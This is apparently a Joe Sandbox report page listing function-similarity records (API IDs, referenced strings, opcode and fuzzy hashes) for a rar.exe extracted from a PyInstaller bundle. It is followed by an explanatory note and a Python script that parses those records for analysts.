                                                              • Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                              • Instruction ID: 66fdf3babcfc0dbd2e701f0aa7e8fd79add9bfa57d762e997f1e357f1d88fd83
                                                              • Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
                                                              • Instruction Fuzzy Hash: 4E210676A182558FEB50DF68D880AAE77F0F788788F144026EE48D3B08DF39E8408F50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                               • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                              • Instruction ID: 629a2b2ea26a721b0c842356e1c7196edc9ed2b98b413abaf2170354e4f8a3e9
                                                              • Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                              • Instruction Fuzzy Hash: F781C162B1864A89FF209F65CCC06BE27A1BB8679AF404135DD0E93B95DF3CA441E712
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                               • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CharHandleWrite$ByteConsoleFileMultiWide
                                                              • String ID:
                                                              • API String ID: 643171463-0
                                                              • Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                              • Instruction ID: 9621b2d8ca2b74d2d90a6c204c54e1088689762348cd09ee9479447fb63b92bb
                                                              • Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
                                                              • Instruction Fuzzy Hash: 8441B521E0964A42FE109F61DD102BF6251AFCB7A2F040335E96D9B7D1DE3CE545E702
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                               • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                              • Instruction ID: 39e717e26df58c6f5d97155213978a190563dfa750a56ffadcf9ecd67f03b602
                                                              • Opcode Fuzzy Hash: 0e6eb9f6afd3336ef7fae7e3833685d0b95f626a5f44511e493326727d516b6b
                                                              • Instruction Fuzzy Hash: 2741B462B09A4ED1FE55AF26DC006BB7291BF86B91F098535DD1DCB794EE3CE400A342
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                               • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                              • Instruction ID: cb34aad0e9304225d749fd67ee830f7be9a9995d87f8f71cdec8656515274942
                                                              • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                              • Instruction Fuzzy Hash: 7F115476E1860B15FE545A28EC8637F15416FD7362E484734E97EC66E6CEACA440B203
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                               • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                               • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: swprintf
                                                              • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                              • API String ID: 233258989-622958660
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: wcschr
                                                              • String ID: MCAOmcao$MCAOmcao
                                                              • API String ID: 1497570035-1725859250
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: wcschr$swprintf
                                                              • String ID: %c:\
                                                              • API String ID: 1303626722-3142399695
                                                              APIs
                                                              Similarity
                                                              • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                              • String ID:
                                                              • API String ID: 904936192-0
                                                              APIs
                                                              Similarity
                                                              • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                              • String ID:
                                                              • API String ID: 932687459-0
                                                              APIs
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                              • String ID:
                                                              • API String ID: 4141327611-0
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,00007FF629AF86CB,?,?,?,00007FF629AFA5CB,?,?,00000000,?,?,00000040,?,?,00007FF629AF2DF9), ref: 00007FF629B0D09D
                                                              • CreateFileW.KERNEL32(?,00007FF629AF86CB,?,?,?,00007FF629AFA5CB,?,?,00000000,?,?,00000040,?,?,00007FF629AF2DF9), ref: 00007FF629B0D0E5
                                                              • CreateFileW.KERNEL32(?,00007FF629AF86CB,?,?,?,00007FF629AFA5CB,?,?,00000000,?,?,00000040,?,?,00007FF629AF2DF9), ref: 00007FF629B0D114
                                                              • CreateFileW.KERNEL32(?,00007FF629AF86CB,?,?,?,00007FF629AFA5CB,?,?,00000000,?,?,00000040,?,?,00007FF629AF2DF9), ref: 00007FF629B0D15C
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              APIs
                                                                • Part of subcall function 00007FF629B3B6D0: Sleep.KERNEL32(?,?,?,?,00007FF629B0CBED,?,00000000,?,00007FF629B37A8C), ref: 00007FF629B3B730
                                                              • new.LIBCMT ref: 00007FF629B2CFD9
                                                              Strings
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: rar$rev
                                                              • API String ID: 3472027048-2145959568
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: e+000$gfff
                                                              • API String ID: 3215553584-3030954782
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: FileModuleName_invalid_parameter_noinfo
                                                              • String ID: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe
                                                              • API String ID: 3307058713-2623522826
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
• Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
Similarity
• API ID: AttributesFilewcsstr
• String ID: System Volume Information\
• API String ID: 1592324571-4227249723
• Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
• Instruction ID: e9c022cc92f4bf02e869f5be14d38bda153ab7c135b9c8885eb43c400e7fda72
• Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
• Instruction Fuzzy Hash: 2631C022A1968646EF54DF31A9906FF6760AF87BC1F444030EE4D87B96DE3CE441A706
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
• Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
Similarity
• API ID: snprintf
• String ID: $%s$@%s
• API String ID: 4288800496-834177443
• Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
• Instruction ID: 3d58edf04852cd0a4a2b16de7b2d24127981d59dce8c0c33f80c0dcaf446123e
• Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
• Instruction Fuzzy Hash: 7E318D62A19A8A96EE10DF35E8407FF2360EBC6785F800032EE0D97B95DE3CE505E705
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
• Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
Similarity
• API ID: LoadString
• String ID: Done
• API String ID: 2948472770-499744565
• Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
• Instruction ID: a51661e60a755f451e61379f93ca4ff84bf3e2668f7ed3791718441e8200ece1
• Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
• Instruction Fuzzy Hash: 66113065B14B4A86EA149F16EC4016EB7A1FBDAFC1F548436CE0DD3324DE3CE5429245
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
• Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
Similarity
• API ID: swprintf
• String ID: ;%%0%du
• API String ID: 233258989-2249936285
• Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
• Instruction ID: 4aef17a3e6639a076220c8043874a79cfdd6b7a88be5d35afd65d33637c1f816
• Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
• Instruction Fuzzy Hash: 3011B222A1868542EF20DF24E8143EE7760FBC9788F595131DF8C8769ADE3CE545DB41
APIs
  • Part of subcall function 00007FF629B242CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF629B2430F
• GetVolumeInformationW.KERNEL32(?,00007FF629B10BED,?,?,00000000,?,?,00007FF629B0F30F,00000000,00007FF629AF6380,?,00007FF629AF2EC8), ref: 00007FF629B1337E
Strings
Memory Dump Source
• Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
• Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
Similarity
• API ID: InformationVolumeswprintf
• String ID: FAT$FAT32
• API String ID: 989755765-1174603449
• Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
• Instruction ID: 93bafe58f2e5806a3310ec7a640c2b303cf1212fb5ef24e14ca56bcfdeb7e341
• Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
• Instruction Fuzzy Hash: 66116D21A18A8A41FF609F10EC952AF6390FBC7345F801031EA4DC6A99EF3CE504EB05
APIs
Strings
Memory Dump Source
• Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
• Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
Similarity
• API ID: ErrorExceptionLastObjectSingleThrowWait
• String ID: WaitForMultipleObjects error %d, GetLastError %d
• API String ID: 564652978-2248577382
• Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
• Instruction ID: 728c99a8e9d32dbeb62b89dcf658ef84697ab3e1d21996f9e42083ffc720189c
• Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
• Instruction Fuzzy Hash: 49E07D21E1480A82EE04AB25AC8517E3251AFD7776F905331D43DC11E59F6C6546E312
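The Similarity records above are the part of this report an analyst actually pivots on: each one pairs an API ID with the strings the function references (joined with "$" when there are several), plus an Opcode ID and fuzzy hashes for code-similarity lookups. The string `C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe` shows where the bundled rar.exe was staged; `_MEI<digits>` under %TEMP% is the extraction directory PyInstaller one-file executables create at run time. The following is an added example, not Joe Sandbox code and not part of the original report: it parses Similarity records of the shape printed on this page into dictionaries, splits multi-string String IDs, groups strings by API, and extracts any file staged under a PyInstaller `_MEI` directory. The "$" joiner is inferred from the records shown (e.g. `FAT$FAT32`) and the sample input is three of this page's records copied inline.

```python
"""Parse Joe Sandbox 'Similarity' function records into structured rows.

Added example for this report page; the field names are the ones the
report prints, the '$' separator between strings is inferred from the
records shown, and SAMPLE is constructed from three records on the page.
"""
import re
from collections import defaultdict

# Constructed sample: three Similarity records from this page, verbatim.
SAMPLE = r"""
Similarity
• API ID: FileModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe
• API String ID: 3307058713-2623522826
• Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
• Instruction ID: a59c86e92d68c902ed49b2e341f2d5ae71cc18d6d8baa46826d321b962dda02e
• Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
• Instruction Fuzzy Hash: C7419E32A08B5AC5EF14EF25DC800BE77A5EB86BC5B548035E90E83B55DF3DE481A302
Similarity
• API ID: InformationVolumeswprintf
• String ID: FAT$FAT32
• API String ID: 989755765-1174603449
• Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
• Instruction ID: 93bafe58f2e5806a3310ec7a640c2b303cf1212fb5ef24e14ca56bcfdeb7e341
• Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
• Instruction Fuzzy Hash: 66116D21A18A8A41FF609F10EC952AF6390FBC7345F801031EA4DC6A99EF3CE504EB05
Similarity
• API ID: AttributesFilewcsstr
• String ID: System Volume Information\
• API String ID: 1592324571-4227249723
• Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
• Instruction ID: e9c022cc92f4bf02e869f5be14d38bda153ab7c135b9c8885eb43c400e7fda72
• Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
• Instruction Fuzzy Hash: 2631C022A1968646EF54DF31A9906FF6760AF87BC1F444030EE4D87B96DE3CE441A706
"""

# "• Key: value"; the key never contains ':' so a Windows path in the
# value (which does) is captured whole.
FIELD_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")

# PyInstaller one-file extraction dir: %TEMP%\_MEI<digits>\<file>
MEI_RE = re.compile(r"\\_MEI\d+\\([^\\]+)$")


def parse_records(text):
    """Split report text on 'Similarity' headers; one dict per record."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "Similarity":
            current = {}
            records.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            current[m.group(1).strip()] = m.group(2).strip()
    return records


def split_strings(string_id):
    """Joe Sandbox joins several strings with '$' (inferred from the page,
    e.g. 'FAT$FAT32' and '$%s$@%s'); empty pieces are dropped."""
    return [s for s in string_id.split("$") if s]


def strings_by_api(records):
    """Map each API ID to every string referenced alongside it."""
    out = defaultdict(list)
    for r in records:
        out[r.get("API ID", "")].extend(split_strings(r.get("String ID", "")))
    return dict(out)


def pyinstaller_staged_files(records):
    """(file name, full path) for every string under a _MEI<digits> dir."""
    hits = []
    for r in records:
        for s in split_strings(r.get("String ID", "")):
            m = MEI_RE.search(s)
            if m:
                hits.append((m.group(1), s))
    return hits


def opcode_ids_equal_fuzzy(records):
    """Sanity check: on this page Opcode ID always equals Opcode Fuzzy Hash."""
    return all(r.get("Opcode ID") == r.get("Opcode Fuzzy Hash") for r in records)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(f"{len(recs)} records parsed")
    for name, path in pyinstaller_staged_files(recs):
        print("staged under PyInstaller _MEI dir:", name, "<-", path)
    for api, strings in strings_by_api(recs).items():
        print(api, "->", strings)
```

Feeding the whole report's text through `parse_records` rather than this sample gives one row per function; grouping by `Instruction Fuzzy Hash` or `Opcode ID` across several reports is how these IDs are meant to be used for code-similarity pivots, while the `_MEI` extraction surfaces every helper binary the PyInstaller bundle dropped alongside rar.exe.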